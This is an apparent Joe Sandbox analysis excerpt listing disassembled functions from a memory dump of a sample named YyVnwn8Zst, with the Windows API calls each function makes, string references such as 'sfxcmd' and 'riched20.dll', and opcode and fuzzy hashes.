Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: c451520e758df61643a566c93060ebe01d4ca69fe2a8a7ab94165b85b3bae328
Instruction ID: f3191b3691bd50cce4a3d28d0f5816df8fa5ad08bbdfe110ba95805052dadd4e
Opcode Fuzzy Hash: c451520e758df61643a566c93060ebe01d4ca69fe2a8a7ab94165b85b3bae328
Instruction Fuzzy Hash: 7F51DD710043829ADB21AF249951BABFFE9EF95304F04089FE48297250FBB1D988CB52

Function 00BE9600 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BE457B,00BE457B,?,?,?,00BE9851,00000001,00000001,47E85006), ref: 00BE965A
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BE9851,00000001,00000001,47E85006,?,?,?), ref: 00BE96E0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,47E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BE97DA
__freea.LIBCMT ref: 00BE97E7

Part of subcall function 00BE7B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BE3006,?,0000015D,?,?,?,?,00BE44E2,000000FF,00000000,?,?), ref: 00BE7B32

__freea.LIBCMT ref: 00BE97F0
__freea.LIBCMT ref: 00BE9815

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: eb3d0cf949ec0e799a19448d56ed11ac36d56c34f3aae4987ff92708aef6627b
Instruction ID: d314104ed8a58533f8396bc22957c86825f492c7963447fac2af3a418f2c8a37
Opcode Fuzzy Hash: eb3d0cf949ec0e799a19448d56ed11ac36d56c34f3aae4987ff92708aef6627b
Instruction Fuzzy Hash: E751F272620246AFDB259F62CC81EBB77EAEB44750F1546A9FC04D7150EB34DC98C6A0

Function 00BC980C Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00BC77E5,?,00000005,?,00000011), ref: 00BC98A8
GetLastError.KERNEL32(?,?,00BC77E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BC98B5
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00BC77E5,?,00000005,?), ref: 00BC98EA
GetLastError.KERNEL32(?,?,00BC77E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BC98F2
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BC77E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BC9937

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 5949d04e730ee56403d53fb0bf929067cc7382a23cc885a236df52c5951b9831
Instruction ID: 0360365960ef06c7a8e611a54b2c0f39bddda1ebec7d9df3915e2a20a171f381
Opcode Fuzzy Hash: 5949d04e730ee56403d53fb0bf929067cc7382a23cc885a236df52c5951b9831
Instruction Fuzzy Hash: BB4100318447466BF7209F248C0AFEABAE4FB01764F10075DF9E0971D0EBB5A998CB91

Function 00BD9AA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00BD9ABC
SHAutoComplete.SHLWAPI(?,00000010), ref: 00BD9AF3

Part of subcall function 00BD1438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00BCADA2,?,?,?,00BCAD51,?,-00000002,?,00000000,?), ref: 00BD144E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BD9AE3

Strings

EDIT, xrefs: 00BD9AC7, 00BD9AD2, 00BD9ADF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 1d37842216c8738548f439d72a24ae85fbab7f859ce5e84a6de93f82add6ec4e
Instruction ID: 95bfedc76ca898322b6b64b016925cb87f2265019bd6e6dbf702cf397a5ef463
Opcode Fuzzy Hash: 1d37842216c8738548f439d72a24ae85fbab7f859ce5e84a6de93f82add6ec4e
Instruction Fuzzy Hash: C4F0823370162877DB20A6559C09FABB7ACDB46B11F440196FE00A32C0EB609901CAF5

Function 00BD9B13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BCFD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BCFD31
Part of subcall function 00BCFD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BCE82C,Crypt32.dll,?,00BCE8AE,?,00BCE892,?,?,?,?), ref: 00BCFD53

OleInitialize.OLE32(00000000), ref: 00BD9B2C
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BD9B63
SHGetMalloc.SHELL32(00C075C0), ref: 00BD9B6D

Strings

riched20.dll, xrefs: 00BD9B1B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: b2513a45128fd988c40677789adf6b98d120bf39592e8f162aba50920c65ef74
Instruction ID: 6efea9b034163949cc4a275a8f467b5b6dc5f30a98a6ef092fc62414a07e86ce
Opcode Fuzzy Hash: b2513a45128fd988c40677789adf6b98d120bf39592e8f162aba50920c65ef74
Instruction Fuzzy Hash: ADF0FFB1D00109ABCB10EF99D8499EFFBFCEF54715F0041AAE815A3250DBB45605CBA1

Function 00BDC8E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BDC8FD
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BDC939

Strings

sfxcmd, xrefs: 00BDC8F8
sfxpar, xrefs: 00BDC934

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: e70936401a58b8afe70e66c13641ff0abf3edb8204fbbdde6e722145a2e34bbe
Instruction ID: cc09749bc359064a605154e559fbe24a7a5cbc4e042b4876a2609e008236f5c0
Opcode Fuzzy Hash: e70936401a58b8afe70e66c13641ff0abf3edb8204fbbdde6e722145a2e34bbe
Instruction Fuzzy Hash: D8F08272401225A6C7212F94DC1AEBAFBE9DF08B41B0000E6BD8957252EA658940C6A1

Function 00BC96E2 Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BC96F2
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00BC970A
GetLastError.KERNEL32 ref: 00BC973C
GetLastError.KERNEL32 ref: 00BC975B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 9085c11d6fba16a981630856d9c3a66dcf0282a7fcef2b93a7b3d9b13574e42d
Instruction ID: 173d2500cbf33ed7288aa22ad3115e04dd0a336609b744bd348172ca4a54c221
Opcode Fuzzy Hash: 9085c11d6fba16a981630856d9c3a66dcf0282a7fcef2b93a7b3d9b13574e42d
Instruction Fuzzy Hash: D8115735A21204EBEB209F618988F7A77E9EB05361F1085AFF82A86190DB348D40DF51

Function 00BE9A87 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BE2E6F,00000000,00000000,?,00BE9A2E,00BE2E6F,00000000,00000000,00000000,?,00BE9C2B,00000006,FlsSetValue), ref: 00BE9AB9
GetLastError.KERNEL32(?,00BE9A2E,00BE2E6F,00000000,00000000,00000000,?,00BE9C2B,00000006,FlsSetValue,00BF6058,00BF6060,00000000,00000364,?,00BE8643), ref: 00BE9AC5
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BE9A2E,00BE2E6F,00000000,00000000,00000000,?,00BE9C2B,00000006,FlsSetValue,00BF6058,00BF6060,00000000), ref: 00BE9AD3

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: dd7b734d38b5b98cf1f5f79e6e6a98fa062026f79fb9ed8e34b97fdcfc2d73bb
Instruction ID: 72e1a4daf0abbd72f3ff41754f2ccaba000d438636211c1a18d9608f57edd0c9
Opcode Fuzzy Hash: dd7b734d38b5b98cf1f5f79e6e6a98fa062026f79fb9ed8e34b97fdcfc2d73bb
Instruction Fuzzy Hash: A501A732611667ABC7218B7ADC84A6777DCEF05B617211671F906E7140DF30ED05C6E0

Function 00BDA3FB Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BDA40C
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00BDA41D
TranslateMessage.USER32(?), ref: 00BDA427
DispatchMessageW.USER32(?), ref: 00BDA431

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
String ID:
API String ID: 1533324876-0
Opcode ID: 1188d93a812acb89f7d7b836a054f57466290795faa05ef2b6c02250b3226787
Instruction ID: 3760e81c24eb39b4cebeb19aad278a25c33383ed8a0ef666f8d2d6d410abd67e
Opcode Fuzzy Hash: 1188d93a812acb89f7d7b836a054f57466290795faa05ef2b6c02250b3226787
Instruction Fuzzy Hash: 43E07D72D0212EA78B20ABE6AC4CDEF7F6DEE062A17404551B51ED3110EA689505CBF1

Function 00BC9CD8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,00BCC9A7,00000001,?,?,?,00000000,00BD4B67,?,?,?,?,?,00BD460C), ref: 00BC9CF3
WriteFile.KERNEL32(?,00000000,?,00BD4814,00000000,?,?,00000000,00BD4B67,?,?,?,?,?,00BD460C,?), ref: 00BC9D33
WriteFile.KERNELBASE(?,00000000,?,00BD4814,00000000,?,00000001,?,?,00BCC9A7,00000001,?,?,?,00000000,00BD4B67), ref: 00BC9D60

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 291b95cb338f549c293d578155eb30dde0fba625720c862a3ee932a8b6cf7ac7
Instruction ID: 64b7358c47f51428f70f669cd524401584eb2e86a0e27102940a732a0d04f698
Opcode Fuzzy Hash: 291b95cb338f549c293d578155eb30dde0fba625720c862a3ee932a8b6cf7ac7
Instruction Fuzzy Hash: A8312772204605AFEB248F24D84CF66B7E8FB50700F10816DF556A35D0CB74E948CBA1

Function 00BC9F96 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BC9FBD
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BC9FF0
GetLastError.KERNEL32(?,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BCA00D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 8d94c669e55c589ecd1a74ac027a1e342f9dbc5268461d356b02241bad17923f
Instruction ID: fca515629ddd1fd963cdce8a1557e8552571c62503e5bb132205b52c054d739d
Opcode Fuzzy Hash: 8d94c669e55c589ecd1a74ac027a1e342f9dbc5268461d356b02241bad17923f
Instruction Fuzzy Hash: 1601923110025865EB329B744C5AFFE73DCEF0A785F0444CDF942E6080DB649940C6A6

Function 00BC3AAF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC3AB4

Strings

CMT, xrefs: 00BC3AC3

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 33706b452b63024f4f47beb73a92527bbb4825a7863313778dd249737491399a
Instruction ID: 4dedb75347d0f9575276942a2dbacb258eca521ca6695822a8f33071e1c26aa9
Opcode Fuzzy Hash: 33706b452b63024f4f47beb73a92527bbb4825a7863313778dd249737491399a
Instruction Fuzzy Hash: 8C71A071504F44AADB25DB74CC91FE7F7E8EB14702F8489AEE1AB87142D6326A48CF50

Function 00BEA579 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BEA59E

Strings

, xrefs: 00BEA5E3

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 8fd2c8a767c0ed8230d17f21dd007b5596cfc0c714d884aef8e0b18a2557ec24
Instruction ID: 7074304e3c09d3a679f9498594eae198ba946ee8c770c6d402c8e45697a695c7
Opcode Fuzzy Hash: 8fd2c8a767c0ed8230d17f21dd007b5596cfc0c714d884aef8e0b18a2557ec24
Instruction Fuzzy Hash: D341F9705043C89EDB228E268C84BF6BBEDEB56308F1844EDE59A87142D335BA45DF61

Function 00BC1DB1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC1DB6

Part of subcall function 00BC3AAF: __EH_prolog.LIBCMT ref: 00BC3AB4

Strings

CMT, xrefs: 00BC1DED

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 17b9cc1ee4ab5a98eefa4439433f3e3ead1c30ac733751fe79a08fbcef0f1e96
Instruction ID: 4a6ff485b9dbdea761feadf5ee6e39fda1ec18df2f0399a2c68c6090b210855c
Opcode Fuzzy Hash: 17b9cc1ee4ab5a98eefa4439433f3e3ead1c30ac733751fe79a08fbcef0f1e96
Instruction Fuzzy Hash: E9211C759041099ECB15EF98D951EEEFBF6EF59300B1008AEE845B7252D7325E50CB60

Function 00BC190B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC190B

Strings

CMT, xrefs: 00BC1984

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 9ea9a45d1c3a862b7b0f6a667fb58da03501701fc0779a53d7150a49e71dbd8d
Instruction ID: 5ba9b62787a8c4a695a615cf8c2cf3ec4c2b2aa630afd9b8ed382e3366827103
Opcode Fuzzy Hash: 9ea9a45d1c3a862b7b0f6a667fb58da03501701fc0779a53d7150a49e71dbd8d
Instruction Fuzzy Hash: A011D270B01205EFDB04DF28C494EBEF7EAEF86300B04449EE805A7243DB719856CBA1

Function 00BE9CBF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,47E85006,00000001,?,000000FF), ref: 00BE9D30

Strings

LCMapStringEx, xrefs: 00BE9CD0, 00BE9CDA

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: b70fa88a065ea64f53a70964b8d3903dd3500a810af9e41cdf1f73615e4f4360
Instruction ID: cf8a0a742cea6a9c4c42568856764ee8a97d0f81cd631623649342d96d7e0ce6
Opcode Fuzzy Hash: b70fa88a065ea64f53a70964b8d3903dd3500a810af9e41cdf1f73615e4f4360
